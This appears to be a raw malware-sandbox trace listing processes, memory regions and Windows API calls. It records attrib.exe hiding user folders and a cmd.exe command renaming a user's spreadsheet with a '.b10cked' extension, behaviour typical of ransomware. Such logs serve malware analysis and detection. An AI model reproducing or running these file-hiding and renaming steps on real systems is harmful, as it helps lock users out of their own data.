os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11740 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" 
Region: id = 11741 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11742 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11743 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 11744 start_va = 0xb40000 end_va = 0xb46fff entry_point = 0xb40000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 11745 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11746 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11747 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 11748 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 11749 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 11750 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11751 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11752 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 
region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11753 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 11754 start_va = 0x490000 end_va = 0x49ffff entry_point = 0x0 region_type = private name = "private_0x0000000000490000" filename = "" Region: id = 11755 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 11756 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11757 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 11758 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 11759 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11760 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 11761 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: 
"c:\\windows\\system32\\msvcrt.dll") Region: id = 11762 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 11763 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 11764 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 11765 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 11766 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 11767 start_va = 0x2b0000 end_va = 0x377fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002b0000" filename = "" Region: id = 11768 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 11769 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 159 os_tid = 0x9cc Process: id = "103" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16880" os_pid = "0x9c0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "101" os_parent_pid = 
"0x848" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\\desktop.ini\" " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11841 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11842 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11843 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11844 start_va = 0x50000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 11845 start_va = 0x2f0000 end_va = 0x2f6fff entry_point = 0x2f0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 11846 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11847 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11848 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: 
id = 11849 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 11850 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 11851 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11852 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11853 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11854 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 11855 start_va = 0x270000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000270000" filename = "" Region: id = 11856 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 11857 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11858 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 11859 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: 
"c:\\windows\\system32\\lpk.dll") Region: id = 11860 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11861 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 11862 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11863 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 11864 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 11865 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 11866 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 11867 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 11868 start_va = 0x300000 end_va = 0x3c7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 11869 start_va = 0x76490000 end_va = 
0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 11870 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 160 os_tid = 0x9e0 Process: id = "104" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16880" os_pid = "0x9f4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "101" os_parent_pid = "0x848" cmd_line = "attrib +h \"C:\\Users\\EEBsYm5\\DOCUME~1\\FCFNNE~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 11871 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11872 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11873 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11874 start_va = 0x90000 end_va = 0xcffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 11875 start_va = 0x930000 end_va = 0x936fff entry_point = 0x930000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" 
(normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 11876 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11877 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11878 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 11879 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Region: id = 11880 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 11881 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 11882 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 11883 start_va = 0xd0000 end_va = 0x136fff entry_point = 0xd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 11884 start_va = 0x180000 end_va = 0x27ffff entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 11885 start_va = 0x3b0000 end_va = 0x3bffff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 11886 start_va = 0x6e440000 end_va = 0x6e45cfff entry_point = 0x6e440000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: 
"c:\\windows\\system32\\ulib.dll") Region: id = 11887 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 11888 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 11889 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 11890 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 11891 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 11892 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 11893 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 11894 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 11895 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" 
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 11896 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 11897 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 11898 start_va = 0x280000 end_va = 0x347fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000280000" filename = "" Region: id = 11899 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 11900 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 161 os_tid = 0x9b8 Process: id = "105" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16880" os_pid = "0xa54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\MUUM~1.XLS\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\Muum.xlsx.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: 
id = 11933 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 11934 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 11935 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 11936 start_va = 0xb0000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x00000000000b0000" filename = "" Region: id = 11937 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 11938 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 11939 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 11940 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 11941 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 11942 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 12295 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 12296 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed 
name = "pagefile_0x0000000000020000" filename = "" Region: id = 12297 start_va = 0x90000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 12298 start_va = 0x1b0000 end_va = 0x216fff entry_point = 0x1b0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 12299 start_va = 0x260000 end_va = 0x35ffff entry_point = 0x0 region_type = private name = "private_0x0000000000260000" filename = "" Region: id = 12300 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 12301 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 12302 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 12303 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 12304 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 12305 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 12306 start_va = 0x76d70000 end_va = 
0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 12307 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 12308 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 12309 start_va = 0x360000 end_va = 0x427fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000360000" filename = "" Region: id = 12310 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 12311 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 12312 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 12313 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 12314 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 12315 start_va = 0x80000 end_va = 0x80fff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 12316 start_va = 0x430000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 12317 start_va = 0x540000 end_va = 0x113ffff entry_point = 0x0 
region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 12318 start_va = 0x1140000 end_va = 0x12a2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001140000" filename = "" Thread: id = 164 os_tid = 0x9b4 [0132.076] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1aff64 | out: lpSystemTimeAsFileTime=0x1aff64*(dwLowDateTime=0x88a76f00, dwHighDateTime=0x1d440a9)) [0132.076] GetCurrentProcessId () returned 0xa54 [0132.076] GetCurrentThreadId () returned 0x9b4 [0132.076] GetTickCount () returned 0x2a0d0 [0132.076] QueryPerformanceCounter (in: lpPerformanceCount=0x1aff5c | out: lpPerformanceCount=0x1aff5c*=18886550141) returned 1 [0132.077] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0132.077] __set_app_type (_Type=0x1) [0132.077] __p__fmode () returned 0x76b331f4 [0132.077] __p__commode () returned 0x76b331fc [0132.077] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0132.077] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0132.077] GetCurrentThreadId () returned 0x9b4 [0132.077] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9b4) returned 0x38 [0132.077] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0132.077] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0132.077] SetThreadUILanguage (LangId=0x0) returned 0x409 [0132.078] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0132.078] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x1afef4 | out: phkResult=0x1afef4*=0x0) returned 0x2 [0132.078] VirtualQuery (in: lpAddress=0x1aff2b, lpBuffer=0x1afec4, dwLength=0x1c | out: 
lpBuffer=0x1afec4*(BaseAddress=0x1af000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0132.078] VirtualQuery (in: lpAddress=0xb0000, lpBuffer=0x1afec4, dwLength=0x1c | out: lpBuffer=0x1afec4*(BaseAddress=0xb0000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0132.078] VirtualQuery (in: lpAddress=0xb1000, lpBuffer=0x1afec4, dwLength=0x1c | out: lpBuffer=0x1afec4*(BaseAddress=0xb1000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0132.078] VirtualQuery (in: lpAddress=0xb3000, lpBuffer=0x1afec4, dwLength=0x1c | out: lpBuffer=0x1afec4*(BaseAddress=0xb3000, AllocationBase=0xb0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0132.078] VirtualQuery (in: lpAddress=0x1b0000, lpBuffer=0x1afec4, dwLength=0x1c | out: lpBuffer=0x1afec4*(BaseAddress=0x1b0000, 